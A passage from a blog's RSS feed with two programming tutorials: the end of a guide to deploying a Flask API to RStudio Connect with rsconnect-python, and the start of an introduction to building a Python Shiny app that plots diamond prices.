&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we can run our app locally with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;flask run
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and check it is working by following the output link http://127.0.0.1:5000.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-deploy-flask-rsconnect"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="deploying-to-rstudio-connect"&gt;Deploying to RStudio Connect&lt;/h2&gt;
&lt;h3 id="adding-a-server"&gt;Adding a server&lt;/h3&gt;
&lt;p&gt;Now we have our Flask app we want to deploy it to a server such as RStudio Connect. To do this we will use the CLI (Command Line Interface) deployment tool &lt;code&gt;rsconnect-python&lt;/code&gt;. This can be installed with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install rsconnect-python
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will then need to add the server which we want to deploy to. However, before we do this we will need to first create an API key. Log into RStudio Connect and click on your user icon in the top left corner, navigate to &amp;ldquo;API Keys&amp;rdquo; and add a new API key.&lt;/p&gt;
&lt;p&gt;&lt;img alt="user menu icon" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/python-api-deployment-rstudio-flask/menu.png" width="1003"&gt;&lt;/p&gt;
&lt;p&gt;Remember to save the API key somewhere as it will only be shown to you once!&lt;/p&gt;
&lt;p&gt;It is also useful to set an API key environment variable in our &lt;code&gt;.env&lt;/code&gt; file. This can be done by running&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;echo &lt;span style="color:#a5d6ff"&gt;&amp;#39;export CONNECT_API_KEY=&amp;lt;your_api_key&amp;gt;&amp;#39;&lt;/span&gt; &amp;gt;&amp;gt; .env
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source .env
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you wish, you can also add an environment variable for the server you are using,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;CONNECT_SERVER&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&amp;lt;your server url&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that the server URL is the part of the URL that comes before &lt;code&gt;connect/&lt;/code&gt;, and it must include a trailing slash.&lt;/p&gt;
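&lt;p&gt;As a rough illustration of that rule, the sketch below derives the server URL from a dashboard URL copied out of the browser. The function name &lt;code&gt;server_url_from_dashboard&lt;/code&gt; and the &lt;code&gt;example.com&lt;/code&gt; address are hypothetical; substitute the address of your own server.&lt;/p&gt;

```python
from urllib.parse import urlsplit, urlunsplit


def server_url_from_dashboard(dashboard_url):
    """Return the part of the URL before 'connect/', keeping the trailing slash.

    Hypothetical helper for illustration only.
    """
    parts = urlsplit(dashboard_url)
    marker = "/connect/"
    # Search the path only, so a host name containing "connect" is not matched
    index = parts.path.find(marker)
    if index == -1:
        raise ValueError("no 'connect/' segment found in the URL path")
    # Keep the path up to and including the slash just before 'connect/'
    base_path = parts.path[: index + 1]
    # Drop any query string and fragment
    return urlunsplit((parts.scheme, parts.netloc, base_path, "", ""))


# Assumed example address, not a real server
print(server_url_from_dashboard("https://example.com/rsc/connect/#/content/listing"))
```

&lt;p&gt;The value returned is what you would store in &lt;code&gt;CONNECT_SERVER&lt;/code&gt;.&lt;/p&gt;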
&lt;p&gt;Now we can add the server with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect add --server &lt;span style="color:#79c0ff"&gt;$CONNECT_SERVER&lt;/span&gt; --name &amp;lt;server nickname&amp;gt; --api-key &lt;span style="color:#79c0ff"&gt;$CONNECT_API_KEY&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can check the server has been added and view its details with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect list
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="deploying-your-flask-app"&gt;Deploying your Flask App&lt;/h3&gt;
&lt;p&gt;Before we deploy our app, there is one more thing to watch out for. Unless you have a &lt;code&gt;requirements.txt&lt;/code&gt; file in the same directory as your app, RStudio Connect will freeze your current environment, that is, record the packages installed in it. Therefore, make sure you run the deploy command from the virtual environment in which you created your Flask app, as this is the environment that will be reproduced on the server.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Aside&lt;/strong&gt; When writing this blog I found there is a bug in pip/ubuntu which adds &lt;code&gt;pkg-resources==0.0.0&lt;/code&gt; when freezing the environment. This causes an error when trying to deploy. To get around this you can create a &lt;code&gt;requirements.txt&lt;/code&gt; file for your current environment and exclude &lt;code&gt;pkg-resources==0.0.0&lt;/code&gt; with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip freeze | grep -v &lt;span style="color:#a5d6ff"&gt;&amp;#34;pkg-resources&amp;#34;&lt;/span&gt; &amp;gt; requirements.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We are now ready to deploy our app by running,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect deploy api -n &amp;lt;server nickname&amp;gt; . --entrypoint flask_demo:app
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;from the &lt;code&gt;flask-deploy-demo&lt;/code&gt; directory.&lt;/p&gt;
&lt;p&gt;Here we have used the flag &lt;code&gt;--entrypoint&lt;/code&gt;. This tells RStudio Connect where our app is located. It is of the form &lt;em&gt;module name:object name&lt;/em&gt;. By default RStudio Connect will look for an entrypoint of the form &lt;em&gt;app:app&lt;/em&gt; so if you have used these names then you won&amp;rsquo;t need to specify the entrypoint flag.&lt;/p&gt;
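&lt;p&gt;To illustrate the &lt;em&gt;module name:object name&lt;/em&gt; form, here is a small sketch of how such a string could be split and resolved in plain Python. The function name &lt;code&gt;resolve_entrypoint&lt;/code&gt; is hypothetical, and this is not necessarily how RStudio Connect or &lt;code&gt;rsconnect-python&lt;/code&gt; resolves entrypoints internally. The standard library &lt;code&gt;json&lt;/code&gt; module stands in for your app module so that the example runs anywhere.&lt;/p&gt;

```python
import importlib

# The default described above: a module called "app" exposing an object called "app"
DEFAULT_ENTRYPOINT = "app:app"


def resolve_entrypoint(entrypoint=DEFAULT_ENTRYPOINT):
    """Import the module named before the colon and return the object named after it.

    Illustrative sketch only; the real deployment tooling may behave differently.
    """
    module_name, separator, object_name = entrypoint.partition(":")
    if not separator or not module_name or not object_name:
        raise ValueError(f"expected 'module:object', got {entrypoint!r}")
    module = importlib.import_module(module_name)
    return getattr(module, object_name)


# "json:dumps" plays the role that "flask_demo:app" plays in this post
dumps = resolve_entrypoint("json:dumps")
print(dumps({"status": "ok"}))
```

&lt;p&gt;With the files from this post, &lt;code&gt;flask_demo:app&lt;/code&gt; would correspond to the &lt;code&gt;app&lt;/code&gt; object defined in &lt;code&gt;flask_demo.py&lt;/code&gt;.&lt;/p&gt;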
&lt;p&gt;And just like that our app is deployed and ready to share!&lt;/p&gt;
&lt;p&gt;You can check your deployment was successful by following the &amp;ldquo;Dashboard content URL&amp;rdquo; which will take you to your published API on RStudio Connect.&lt;/p&gt;
&lt;h2 id="further-reading"&gt;Further reading&lt;/h2&gt;
&lt;p&gt;We hope you found this post useful!&lt;/p&gt;
&lt;p&gt;If you wish to learn more about Flask or deploying applications to RStudio Connect you may be interested in the following links:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://flask.palletsprojects.com/en/2.1.x/quickstart/" rel="external"&gt;Flask quickstart&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.rstudio.com/connect/user/publishing/" rel="external"&gt;Publishing to RStudio Connect&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-shiny-python-flask/" rel="external"&gt;Recreating a Shiny app with Flask&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-posit-connect-deployment-management/" rel="external"&gt;Introduction to RStudio Connect course&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-api-deployment-rstudio-flask/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Hello Shiny Python</title><link>https://www.jumpingrivers.com/blog/r-shiny-python-posit-rstudio/</link><pubDate>Tue, 23 Aug 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-shiny-python-posit-rstudio/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-python-posit-rstudio/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-shiny-python-posit-rstudio/shinylive.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We would &lt;a href="https://posit.co/" rel="external"&gt;posit&lt;/a&gt; (see what we did there) that R-&lt;a href="https://shiny.rstudio.com/" rel="external"&gt;{shiny}&lt;/a&gt; has been a boon for data science practitioners
using the R language over the last decade. We know that in our Python work, we have certainly been clamouring for something of the same ilk. And
whilst there are other frameworks that we also like, streamlit and dash to name a couple, neither of them has filled us with the same excitement and confidence
that shiny did in R to build both simple and complex bespoke web applications. With &lt;del&gt;RStudio&lt;/del&gt; Posit conf in action the big news from July 27th was the alpha release of Py-&lt;a href="https://shiny.rstudio.com/py/" rel="external"&gt;{shiny}&lt;/a&gt; which was a source of great interest for us, so we couldn&amp;rsquo;t resist installing and starting to build.&lt;/p&gt;
&lt;p&gt;If you are familiar with R-shiny already, then much of the py-shiny package will feel familiar to you (albeit with a couple of things having been renamed). However, we will approach the rest of this post assuming that the reader does not have that prior experience, and take you through building a simple shiny application to display plots on subsets of a dataset.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-hello-shiny-python"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="installing"&gt;Installing&lt;/h2&gt;
&lt;p&gt;As it is released on pypi.org, installing shiny is as straightforward as installing any other Python package. We can set up a virtual environment with shiny and the other dependencies we will use as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;virtualenv .venv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source .venv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install shiny plotnine
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="creating-an-application"&gt;Creating an application&lt;/h2&gt;
&lt;p&gt;An application is composed of two parts, the user interface (UI) front end that the end user will use to navigate your application and a server function which defines the logic of your application.&lt;/p&gt;
&lt;p&gt;The UI functions in the shiny library just generate HTML, CSS and JavaScript code, which is shipped to the browser and rendered. A basic page might be created with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ui
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;frontend &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page_fluid(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Shiny Python&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you print this object to the console, you will see the HTML tags that are generated&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;frontend
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;html&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;head&amp;gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;body&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;div class=&amp;#34;container-fluid&amp;#34;&amp;gt;Hello Shiny Python&amp;lt;/div&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Digging into the source a little deeper, we find that it also includes Bootstrap and jQuery as dependencies. These libraries provide the backbone for the default visuals of HTML elements and for the communication between the client-side browser and the back end logic.&lt;/p&gt;
&lt;p&gt;To run an app we also need a server function, which has three parameters:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;input: An object that contains the bindings to values being set by the client side JavaScript&lt;/li&gt;
&lt;li&gt;output: An object that will allow us to send responses back to our front end&lt;/li&gt;
&lt;li&gt;session: An object that contains data and methods related to a specific user session&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To display our front end we could define a simple server function&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# of course this server won&amp;#39;t do anything useful, but is&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# enough to run an app to display our current UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;server&lt;/span&gt;(input, output, session):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;And finally create a &lt;code&gt;shiny.App&lt;/code&gt; object to link the two things together&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; App
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; App(frontend, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The full source for this trivial example, which we have saved as &amp;ldquo;hello.py&amp;rdquo; for this blog post, would be&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# hello.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ui, App
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;frontend &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page_fluid(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello Shiny Python&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;server&lt;/span&gt;(input, output, session):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; App(frontend, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="running-my-application"&gt;Running my application&lt;/h3&gt;
&lt;p&gt;The {shiny} python package also has a command line tool to run the application.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shiny run --port &lt;span style="color:#a5d6ff"&gt;5000&lt;/span&gt; hello.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This starts the app. Navigate to &amp;ldquo;localhost:5000&amp;rdquo; to see it running.&lt;/p&gt;
&lt;h2 id="something-a-little-more-interesting"&gt;Something a little more interesting&lt;/h2&gt;
&lt;p&gt;We will build a simple web application that will let us dynamically update a plot of prices of different diamonds, depending on the user choice of colours.&lt;/p&gt;
&lt;p&gt;{shiny} python provides a host of widgets that can be used to take input from a user, which will send that data to the back end server. It also provides
a set of output containers in which to render results received from the server. A simple user interface for this might be defined as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;shiny&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ui
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotnine.data&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; diamonds
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# function that creates our UI based on the data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# we give it&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_ui&lt;/span&gt;(data: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# calculate the set of unique choices that could be made&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; choices &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;unique()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# create our ui object&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app_ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page_fluid(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# row and column here are functions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# to aid laying out our page in an organised fashion&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;row(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;column(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, offset&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,&lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# an input widget that allows us to select multiple values&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# from the set of choices&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;input_selectize(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;select&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Color&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; choices&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;list(choices),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; multiple&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;column(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;column(&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# an output container in which to render a plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;output_plot(&lt;span style="color:#a5d6ff"&gt;&amp;#34;out&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
